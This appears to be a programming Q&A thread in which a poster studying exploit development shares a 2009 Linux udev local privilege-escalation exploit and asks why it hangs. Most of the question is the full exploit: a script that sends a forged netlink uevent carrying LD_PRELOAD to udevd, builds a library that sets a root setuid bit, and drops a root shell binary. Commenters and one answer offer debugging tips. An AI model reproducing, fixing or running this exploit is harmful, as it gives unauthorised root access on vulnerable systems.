# Just hangs when running udev

Tags: c, exploit

I have successfully compiled the following code with no issues. But when i try to run "udev" on the box, it justs keeps hanging and doesn't do anything. I can't figure out why and i've been working on this for the last few days and pulling teeth trying to figure out why it justs hangs. Can anyone please assist me with this. I am studying exploit development and i am completely stuck on this.

```
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique 
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];

        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");

        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;

        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;

        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

        char message[LONG_STRING];
        char *mp;

        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);

        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);

        sendmsg(socket_fd, &msg, 0);

        close(socket_fd);

    sleep(10);
    execl("/tmp/suid", "suid", (void*)0);
}

_EOF
gcc --no-warnings udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 setgid(0);
 setuid(0);
 unsetenv("LD_PRELOAD");
 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}

_EOF
gcc --no-warnings -o program.o -c program.c -fPIC
gcc --no-warnings -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
gcc --no-warnings -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1

# milw0rm.com [2009-04-20]
```

Comment: `buflen` is apparently not used. Hmmm  Are all fields of `msg` set?  [ref](https://linux.die.net/man/2/sendmsg)

Comment: thanks man, i'm still learning this stuff, but where would you add that?

Comment: buflen is not needed as the length is specified in `iovector.iov_len`.

Comment: Why are you compiling with `--no-warnings`?  You should be compiling with as many warnings as possible, not with none.  Use `gcc -Wall -Wextra` for starters; you should use more than that.

Comment: for ease of readability and understanding: 1) follow the axiom: *only one statement per line and (at most) one variable declaration per statement.*  2) treat a closing brace '}' as a separate statement

Comment: the 'boolean' values TRUE and FALSE are properly defined in the header file: stdbool.h.   Suggest you use that header file rather than the `#define` statements for TRUE and FALSE.

Comment: on most systems, the stack starts as the low address and builds upward. so this line: `buflen = (int)(mp-message);` probably will not work.  suggest: `buflen = LONG_STRING;`,   Also, why turn off compiler warnings?  That is a very bad idea

Comment: the file: `suid.c`, which has the main() function, is missing the `#include` statements needed for the functions: `setgid() and `setuid()` and `execl()`.  The program.c file is missing the statement: `#include <unistd.h>`  for the `execl()` m setgid()`, setuid()` functions

Comment: strongly suggest the OP learn how to use a `makefile` and the `make` utility and not try to bury the source code and shell statements inside a script file.

Answer (score 2):

There is an obvious hang as you are calling `sleep(10)` in your program, on the other hand, please check the return code of the socket functions, see if any of these failed:

```
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
if (socket_fd < 0) { ... }
ret = bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
if (ret < 0) {...}
ret = sendmsg(socket_fd, &msg, 0);
if (ret < 0) {// send failed}
```